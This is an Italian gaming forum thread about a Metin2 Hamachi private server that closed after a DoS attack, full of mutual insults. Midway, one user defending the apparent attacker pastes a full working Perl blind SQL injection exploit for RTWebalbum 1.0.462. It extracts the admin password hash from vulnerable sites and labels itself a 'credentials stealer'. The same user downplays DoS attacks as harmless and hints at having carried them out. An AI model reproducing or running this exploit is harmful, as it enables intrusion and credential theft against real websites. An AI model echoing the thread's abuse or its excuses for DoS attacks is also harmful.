AvengedMt2- Best Hamachi Server Semi-Old style 24/24, vieni anche tu!

[Heisenberg™]

Profondo disprezzo per il BM che ha dossato uno dei migliori (se non il migliore) hamachi del momento.

 

[Papogne]

Hanno dossato? Ragazzi vergognatevi..

 

[BearGrylls]

raga server chiuso. Grazie a quelli che hanno dossato l'host ha deciso di chiudere tutto, ed il lagg era diventato insostenibile.

dagli na mano a riaprirlo con le protezioni adeguate, era proprio un bel server. Un grazie va anche al bm Xordas che essendo un fallito in real va a distruggere il lavoro degli altri dietro un pc, fallito. Va a guardarti naruto così ti bruci anche l'ultimo neurone che ti è rimasto.

 

[Heisenberg™]

raga server chiuso. Grazie a quelli che hanno dossato l'host ha deciso di chiudere tutto, ed il lagg era diventato insostenibile.

Simo, convincilo a riaprire, mettete le protezioni e rimettete ON..tanto i backup li avete.
Oltre 50 player nella giornata di ieri vorranno dire qualcosa..

 

[Hell ©]

Davvero un peccato...
e diamine avevo finito l'equip ._.
Un grazie a chi l'ha dossato...non è che ci aiutiamo e proviamo a mantenere un server veramente bello..vaabeh
L'ha fatto per far divertire la gente, non ci guadagnava nulla..arriva il bm e via...
*scusate il leggero sfogo*

 

[Ev4ng3li0n]

Se mi aiutate a trovare un buon hoster entro poche ore si riapre.

 

[deleted5917]

e pensare che xordas voleva solo avvisare che avete scarze protezioni e invece voi lo attaccate

Dominator lasciali perdere.. anche se gli do l'exploit per mysql loro non se ne farebbero niente
Visto che io sono troppo "bm" per non cancellare i database vediamo il primo che lo fa postando la BLIND SQL INJECTION

#!/usr/bin/perl

#-----------------------------------------------------------------


#BLIND SQL INJECTION (GET var 'AlbumID')--RTWebalbum 1.0.462-->


#-----------------------------------------------------------------


#


#CMS INFORMATION:


#


#-->WEB: http://rtwebalbum.x12.pl/


#-->DOWNLOAD: http://sourceforge.net/projects/rtwebalbum/


#-->DEMO: http://rtwebalbum.x12.pl/


#-->CATEGORY: CMS / Image Gallery


#-->DESCRIPTION: Free web album scripts in PHP. Include administration panel to easy


# manage content of album. If you decide to use this web...


#


#CMS VULNERABILITY:


#


#-->TESTED ON: firefox 3


#-->DORK: "2007 Rafal Kucharski"


#-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT


#-->AFFECT VERSION: v1.0.462 (maybe <= ?)


#-->Discovered Bug date: 2009-05-04


#-->Reported Bug date: 2009-05-04


#-->Fixed bug date: 2009-05-06


#-->Info patch (1.0.574): http://sourceforge.net/projects/rtwebalbum


#-->Author: YEnH4ckEr


#-->mail: y3nh4ck3r[at]gmail[dot]com


#-->WEB/BLOG: N/A


#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.


#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)


#


#


#-----------


#BUG FILES:


#-----------


#


#Path --> [HOME_PATH]/index.php


#It contents:


#    ...


#


#    if (!isset($_GET['AlbumId'])) {


#     $AlbumId = 0;


#    } else {


#     $AlbumId = $_GET['AlbumId'];


#    }


#


#    ...


#


#


#if ($AlbumId <> 0){


#


#    $picArr = array();


#    $query = "SELECT * FROM pictures WHERE AlbumID=".$AlbumId." order by ID";


#    $result=mysql_query($query);


#


#    ...


#}


#------------


#CONDITIONS:


#------------


#


#


#**Exist a valid image with title


#


#**gpc_magic_quotes=off/on


#


#---------------------------------------


#PROOF OF CONCEPT (BLIND SQL INJECTION):


#---------------------------------------


#


#http://[HOST]/[HOME_PATH]/index.php?AlbumId=3+AND+1=1%23 --> title is displayed (true)


#


#http://[HOST]/[HOME_PATH]/index.php?AlbumId=3+AND+1=0%23 --> title is not displayed (false)


#


#


#######################################################################


#######################################################################


##*******************************************************************##


## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ... ##


##*******************************************************************##


##-------------------------------------------------------------------##


##*******************************************************************##


## GREETZ TO: SPANISH H4ck3Rs community! ##


##*******************************************************************##


#######################################################################


#######################################################################


#


#


use LWP::UserAgent;


use HTTP::Request;


#Subroutines


sub lw


{


my $SO = $^O;


my $linux = "";


if (index(lc($SO),"win")!=-1){


$linux="0";


}else{


$linux="1";


}


if($linux){


system("clear");


}


else{


system("cls");


system ("title RTWebalbum v1.0.462 (GET var 'AlbumID') BLIND SQL Injection Exploit");


system ("color 03");


}


}


sub request {


my $userag = LWP::UserAgent->new;


$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');


my $request = HTTP::Request -> new(GET => $_[0]);


my $outcode= $userag->request($request)->as_string;


return $outcode;


}


sub helper {


print "\n\t[XxX] RTWebalbum v1.0.462 (GET var 'AlbumID') BLIND SQL Injection Exploit\n";


print "\t[XxX] USAGE MODE: [XxX]\n";


print "\t[XxX] perl $0 [HOST] [PATH] [AlbumID]\n";


print "\t[XxX] [HOST]: Web.\n";


print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";


print "\t[XxX] [AlbumID]: Valid AlbumID.\n";


print "\t[XxX] Example: perl $0 'www.example.es' 'rtwebalbum' '1'\n";


}


sub error {


print "\t-----------------------------------------------------------------\n";


print "\tWEB IS NOT VULNERABLE!\n";


print "\tMaybe --> \n";


print "\t1.-Patched\n";


print "\t2.-AlbumID doesn't exist\n";


print "\t3.-AlbumID hasn't available image\n";


print "\t4.-output needs more characters\n";


print "\tEXPLOIT FAILED!\n";


print "\t-----------------------------------------------------------------\n";


}


sub testedblindsql {


print "\t-----------------------------------------------------------------\n";


print "\tWEB IS VULNERABLE!\n";


print "\tTested Blind SQL Injection.\n";


print "\tStarting exploit...\n";


print "\t-----------------------------------------------------------------\n";


}


sub password {


#Finally password...md5= 32-digits


$k=1;


$z=48;


while(($k<=32) && ($z<=126)){


my $blindsql=$_[0].'+AND+ascii(substring((SELECT+password+FROM+config),'.$k
.',1))='.$z.'%23';


$output=&request($blindsql);


if ( $output =~ (/\<div id=\"descrp\">([a-zA-Z0-9\s]+)\<\/div\>/))


{


$pass=$pass.chr($z);


$k++;


$z=47;


}


if($z==57)


{


$z=96;


}


#new char


$z++;


}


return $pass;


}


#Main


&lw;


print "\t\t#########################################################\n\n";


print "\t\t#########################################################\n\n";


print "\t\t## RTWebalbum v1.0.462 - BLIND SQL Injection Exploit ##\n\n";


print "\t\t## Author: Y3nh4ck3r ##\n\n";


print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";


print "\t\t## Proud to be Spanish! ##\n\n";


print "\t\t#########################################################\n\n";


print "\t\t#########################################################\n\n";


#Init variables


my $host=$ARGV[0];


my $path=$ARGV[1];


my $AlbumID=$ARGV[2];


#Build the uri


if($path eq "no-path"){


$finalhost="http://".$host."/index.php?AlbumId=".$AlbumID;


}else{


$finalhost="http://".$host."/".$path."/index.php?AlbumId=".$AlbumID;


}


#Check all variables needed


$numArgs = $#ARGV + 1;


if($numArgs<=2)


{


&helper;


exit(1);


}


$finalrequest = $finalhost;


#Testing blind sql injection


$blindsql=$finalrequest."+AND+1=1%23"; #blind sql injection


$output=&request($blindsql);


if ( $output =~ (/\<div id=\"descrp\">([a-zA-Z0-9\s]+)\<\/div\>/))


{


#blind sql injection is available


&testedblindsql;


}else{


#Not injectable


&error;


exit(1);


}


#Bruteforcing password...


$passhash=&password($finalrequest);


print "\n\t\t*************************************************\n";


print "\t\t**** EXPLOIT EXECUTED (CREDENTIALS STEALER) ****\n";


print "\t\t*************************************************\n\n";


print "\t\tAdmin: admin (always)\n";


print "\t\tAdmin-password(md5 hash):".$passhash."\n\n";


print "\n\t\t<<----------------------FINISH!-------------------->>\n\n";


print "\t\t<<---------------Thanks to: y3hn4ck3r-------------->>\n\n";


print "\t\t<<------------------------EOF---------------------->>\n\n";


exit(1);


#Ok...all job done

- - - Updated - - -

dagli na mano a riaprirlo con le protezioni adeguate, era proprio un bel server. Un grazie va anche al bm Xordas che essendo un fallito in real va a distruggere il lavoro degli altri dietro un pc, fallito. Va a guardarti naruto così ti bruci anche l'ultimo neurone che ti è rimasto.

Lo sai quanto ti sto cagando in questo momento?
risposte cosi sono copia e incolla per farsi dare il tanto ambito "mi piace" da tutti i nerd che ti vanno appresso
e prima di dire "essendo un fallito" prima addami su facebook... a scusa tu non lo adoperi,
N3rd

 

[Asdaladino]

bello il 24h su 24 ! , bellissimo ! ma raga, ora sono le 25 ? le 26 forse ! perchè mi sa che non è tanto on

 

[Ev4ng3li0n]

ho detto che abbiamo chiuso >.<, appena trovo un altro hoster si riapre...

 

[i Am Pro and you NO]

bello il 24h su 24 ! , bellissimo ! ma raga, ora sono le 25 ? le 26 forse ! perchè mi sa che non è tanto on

Ma tu guardi solo la prima e l'ultima pagina prima di entrare? è stato attaccato da bm hacker... Forse riapre...

 

[deleted5917]

Ma tu guardi solo la prima e l'ultima pagina prima di entrare? è stato attaccato da bm hacker... Forse riapre...

Dossare non significa attaccare il ddos vale solo quando è attivo e non fa danni d alcun genere al server, quindi è il gf che inventa scuse per non aprire.

 

[BearGrylls]

Lo sai quanto ti sto cagando in questo momento?
risposte cosi sono copia e incolla per farsi dare il tanto ambito "mi piace" da tutti i nerd che ti vanno appresso
e prima di dire "essendo un fallito" prima addami su facebook... a scusa tu non lo adoperi,
N3rd

ecco l'ultimo neurone è andato, del tanto ambito mi piace non me ne può fregare niente, essendo un accanito frequentatore del forum con 26 mex, tu devi fare il figo per far vedere cosa? che sai dossare? ormai lo fanno pure i 13enni magari sei uno di quelli, inutile che vieni a dire che se volevi potevi eliminare il database che tanto cmq il server lo rovini lo stesso perchè lagga e la gente se ne va. Uno che distrugge il lavoro degli altri dove la gente passa del tempo cercando di divertirsi, è un fallito cè poco da fare dentro la tua misera testolina cè qualcosa che non va, per quello spero che tu abbia sui 12-13 anni. Ti avranno fottuto chissà quante volte per farti diventare così, e speriamo solo col pc e non in senso letterale lol. Un vero hacker, farai strada andrai all'FBI.

 

[deleted5917]

guarda non rispondo perchè non voglio sprecare altro tempo con questi bambini di prima elementare

- - - Updated - - -

e non ho mai detto che sono hacker o voglio diventarlo

- - - Updated - - -

hai una testolina..? usala ogni tanto magari, non solo per ragionare sui bonus migliori per una hawang acquatica rossa

 

[BearGrylls]

guarda non rispondo perchè non voglio sprecare altro tempo con questi bambini di prima elementare

- - - Updated - - -

e non ho mai detto che sono hacker o voglio diventarlo

- - - Updated - - -

hai una testolina..? usala ogni tanto magari, non solo per ragionare sui bonus migliori per una hawang acquatica rossa

Fatto sta che a rompere le palle sei bravo, cosa volevi? un bravo, grazie mille per averci detto che le protezioni facevano schifo, ma per carità, guardati naruto e non rompere le palle alla gente.

 

[deleted5917]

ti ho detto che se per ora è off non è per colpa mia dato che i dos non fanno danno al server ma lo mandano off quando sono attivi.. se per ora è off è per colpa del gf non mia
e comunque prima di dare giudizi su una persona prima conoscila poi puoi dire quello che vuoi,
continua cosi che andrai avanti nella vita...

 

[BearGrylls]

ti ho detto che se per ora è off non è per colpa mia dato che i dos non fanno danno al server ma lo mandano off quando sono attivi.. se per ora è off è per colpa del gf non mia
e comunque prima di dare giudizi su una persona prima conoscila poi puoi dire quello che vuoi,
continua cosi che andrai avanti nella vita...

Non è quello che stai facendo tu cmq, pensavo di essere stato chiaro ma forse devo ripeterlo, il dos non rovinerà il server ma lo fa laggare in maniera assurda rovinando il gameplay, quindi la gente se ne va e così il server è rovinato, il gf lo ha chiuso perchè il gioco era diventato insostenibile, chissà che sta volta ci arrivi. Se tu e chi altro invece di distruggere server vi fate i caxxi vostri non è meglio?

 

[Think Pink]

e pensare che xordas voleva solo avvisare che avete scarze protezioni e invece voi lo attaccate

uno che vuole avvisare un gf che il suo server non ha protezione ,non fa' quello che ha fatto xordas ,ti dico quello che andava fatto caro dominator:1) messaggio privato,2)non entrare nel database del server,3)non fare il sapientone nel postare tramite screen il tentativo o l'attakko doos .Quindi non difenderlo solamente perche' hai giocato nei suoi fantastici "devo ammetterlo"! hamachi ,no caro xordas questo non si fa' da te' non me lo sarei aspettato.

 

[F.Mercury]

ti ho detto che se per ora è off non è per colpa mia dato che i dos non fanno danno al server ma lo mandano off quando sono attivi.. se per ora è off è per colpa del gf non mia
e comunque prima di dare giudizi su una persona prima conoscila poi puoi dire quello che vuoi,
continua cosi che andrai avanti nella vita...

Amico alla tua età non si deve bere troppo la sera e mi riferisco anche alla cose che hai scritto prima.

 

[Heisenberg™]

uno che vuole avvisare un gf che il suo server non ha protezione ,non fa' quello che ha fatto xordas ,ti dico quello che andava fatto caro dominator:1) messaggio privato,2)non entrare nel database del server,3)non fare il sapientone nel postare tramite screen il tentativo o l'attakko doos .Quindi non difenderlo solamente perche' hai giocato nei suoi fantastici "devo ammetterlo"! hamachi ,no caro xordas questo non si fa' da te' non me lo sarei aspettato.

Concordo in pieno, se voleva avvisarli che le protezioni facevano schifo, ha scelto il modo più meschino.
Invece di dargli un consiglio, e aiutarli che fa? Li finisce di azzoppare, e questo dovrebbe essere un favore? Ma non diciamo cazzate.

 

[F.Mercury]

Concordo in pieno, se voleva avvisarli che le protezioni facevano schifo, ha scelto il modo più meschino.
Invece di dargli un consiglio, e aiutarli che fa? Li finisce di azzoppare, e questo dovrebbe essere un favore? Ma non diciamo cazzate.

Cazzate *Trollface* ....Comunque non tutti hanno la stessa filosofia di pensiero e quella di Xordas fa altamente cagare,probabilmente avrà rosicato in game e allora ha fatto quel che ha fatto,classico dei bambini

 

[deleted5917]

oddio basta ahahahaha basta ahahuahuauh uno più leccaculo dell'altro ahahahahah

 

[F.Mercury]

oddio basta ahahahaha basta ahahuahuauh uno più leccaculo dell'altro ahahahahah

Di certo essere più scemi (per non dire altro) di te è difficile.

 

[Heisenberg™]

Di certo essere più scemi (per non dire altro) di te è difficile.

EPIC WIN.

 

[Ev4ng3li0n]

raga invece di scannarvi in chat, perchè quel che è fatto ormai è fatto, aiutatemi a trovare sto hoster >.<

 

[deleted5917]

raga invece di scannarvi in chat, perchè quel che è fatto ormai è fatto, aiutatemi a trovare sto hoster >.<

non serve non ti tocco più puoi riaprire anche ora se non l'hai capito